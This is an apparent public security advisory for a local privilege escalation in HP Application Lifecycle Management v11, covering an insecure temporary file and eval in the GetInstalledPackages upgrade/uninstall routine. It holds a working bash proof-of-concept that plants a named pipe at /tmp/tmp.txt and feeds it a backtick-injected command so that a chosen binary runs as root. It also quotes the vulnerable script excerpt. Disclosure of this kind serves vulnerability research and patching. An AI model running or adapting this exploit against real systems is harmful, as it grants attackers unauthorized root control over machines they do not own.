================
Privilege escalation vulnerability in HP Application Lifestyle Management
(ALM) Platform v11

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================

The HP Application Lifestyle Management configuration tool contains a
vulnerable function 'GetInstalledPackages' which is called when upgrading
or uninstalling HP ALM. The AIX, HP-UX and Solaris versions use
/tmp/tmp.txt in a similar, insecure manner.

================
Timeline:
================

30 November 2011 - Reported to HP. Ignored.
08 December 2011 - Public disclosure

================
Exploit:
================

#!/bin/bash
# Simple PoC : Run as user, when vulnerable function is called
# /home/user/binary_to_run_as_root is run as root.
cat > file << EOF
Child Components
0a29406d9794e4f9b30b3c5d6702c708
\`/home/user/binary_to_run_as_root\`
EOF
mkfifo /tmp/tmp.txt			# set trap
cat /tmp/tmp.txt			# blocks for victim
while [ -e /tmp/tmp.txt ]; do
       cat file > /tmp/tmp.txt
       sleep 2
done
rm file
--
================
Details:
================

e.g. from GetInstalledPackages in SunOS_lib.sh (Solaris):
---
prodreg info -u $PRODUCT_NAME > /tmp/tmp.txt
<snip>
firstRow=`awk '/Child Components/ { print NR;}' /tmp/tmp.txt`
<snip>
firstRow=`expr $firstRow + 3`
lastRow=`awk 'END { print NR }' /tmp/tmp.txt`
<snip>
eval \child$numOfPackages=`awk '{ if ( NR == pattern ) { print $1 } }'
pattern=$firstRow /tmp/tmp.txt`
<snip>
rm /tmp/tmp.txt
---